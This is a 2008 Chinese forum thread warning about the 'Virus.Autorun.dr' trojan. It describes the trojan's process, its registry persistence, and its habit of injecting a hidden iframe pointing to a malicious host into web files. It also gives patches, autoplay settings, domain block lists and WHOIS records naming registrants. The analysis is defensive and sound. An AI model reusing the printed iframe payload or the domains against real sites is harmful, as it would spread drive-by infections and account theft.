RE: 电脑上网好慢,中www.851733.cn了! 软件使用交流 SMT之家论坛|SMT|Surface Mount Technology|表面贴装技术

SMT之家论坛 -> 软件使用交流 -> RE: 电脑上网好慢,中www.851733.cn了!

登录 -> 注册 -> 回复主题 -> 发表主题

nestor

2008-03-30 00:37

近日，有一个假冒微软网站进行传播的病毒，该病毒会感染网页文件，向其中插入恶意网址连接，并利用多个系统漏洞下载20多个恶性网游木马，盗取游戏玩家的帐号和密码，给玩家带来极大的损失。详细的技术分析如下：

病毒名称：Virus.Autorun.dr

中文名：网页收割者

病毒类型：木马

危害等级：★★★

影响平台：Win 9X/ME/NT/2000/XP/2003

1. Virus.Autorun.dr 网页收割者病毒采用Delphi 工具编写，病毒运行后，会创建病毒进程：crsss.exe，该进程指向的路径为：%WinDir%\System32\crsss.exe,文件大小为 62512字节。

该病毒在注册表中添加下列启动项：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"crsss" = %WinDir%\system32\crsss.exe

这样，在Windows启动时，病毒就可以自动执行。

2. 该病毒还会搜索硬盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件，向其中插入恶意网址连接<IfrAmE src=http://mlcro-soft.cn/update.htm width=0 height=0></IfrAmE>，该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行20多个恶性网游木马，盗取游戏玩家的帐号和密码，给玩家带来极大的损失。

*************************************************************
建议通过Windows系统的Windows Update 功能更新操作系统补丁，尤其是一定要打上MS06-014漏洞，MS07-017漏洞，MS07-004漏洞等网页木马多用漏洞。

MS06-014 补丁下载网址：

http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx

MS07-017 补丁下载网址：

http://www.microsoft.com/china/technet/security/bulletin/MS07-017.mspx

MS07-004 补丁下载网址：

http://www.microsoft.com/china/technet/security/bulletin/MS07-004.mspx

*******************************************************
禁用系统的自动播放功能，防止病毒从U盘、MP3、移动硬盘等移动存储设备进入到计算机。

禁用Windows 系统的自动播放功能的方法：在运行中输入 gpedit.msc 后回车，打开组策略编辑器，依次点击：计算机配置－＞管理模板－＞系统－＞关闭自动播放－＞已启用－＞所有驱动器－＞确定。

请选择具有U盘病毒免疫功能的杀毒软件如：KV2007,KV2008 杀毒软件。

4. 不要随意接收从QQ、MSN等即时聊天工具发送过来的可执行文件，不要登陆来历不明的网址连接。

5. 希望企业的网管使用防火墙或者上网行为管理设备对 mlcro-soft.cn 和 851733.cn 这两个网址进行屏蔽。

************************************************************

另外：关于恶意网址 mlcro-soft.cn 和 851733.cn 的Whois域名信息：

Domain Name: mlcro-soft.cn
ROID: 20070815s10001s54276580-cn
Domain Status: clientTransferProhibited
Registrant Organization: 季红兵
Registrant Name: 季红兵
Administrative Email: mlcrosoftusa@163.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns2.pro.net.cn
Name Server:ns1.pro.net.cn
Registration Date: 2007-08-15 22:08
Expiration Date: 2008-08-15 22:08

Domain Name: 851733.cn
ROID: 20070702s10001s10570373-cn
Domain Status: ok
Registrant Organization: 李强
Registrant Name: 李强
Administrative Email: admin@851733.cn
Sponsoring Registrar: 厦门华商盛世网络有限公司
Name Server:ns1.4everdns.com
Name Server:ns2.4everdns.com
Registration Date: 2007-07-02 14:38
Expiration Date: 2008-07-02 14:38

其中季红兵和李强这两个人名可能是用虚假信息注册的，希望企业的网管使用防火墙或者上网行为管理设备对这两个网址进行屏蔽。
**********************************************

建议屏蔽以下近期多发恶意网址：

www.121161.com
xxx.745970.com
www.souxse.cn
955922.cn
aaa.369678.cn

justin029	2008-04-12 07:43
其实你的系统经常升级就可以了....

sbipce	2008-04-12 09:31
QUOTE: 原帖由1楼楼主 justin029 于2008-04-12 07:43发表其实你的系统经常升级就可以了.... 盗版的系统升级有用吗? 装一个正版的杀毒软件就OK!网上有很多免费试用的,也可以在网上买一个,几十块钱可以用一年.

查看完整版本: [-- RE: 电脑上网好慢,中www.851733.cn了! --] [-- top --]

Time 0.047988 second(s),query:3 Gzip enabled

You can contact us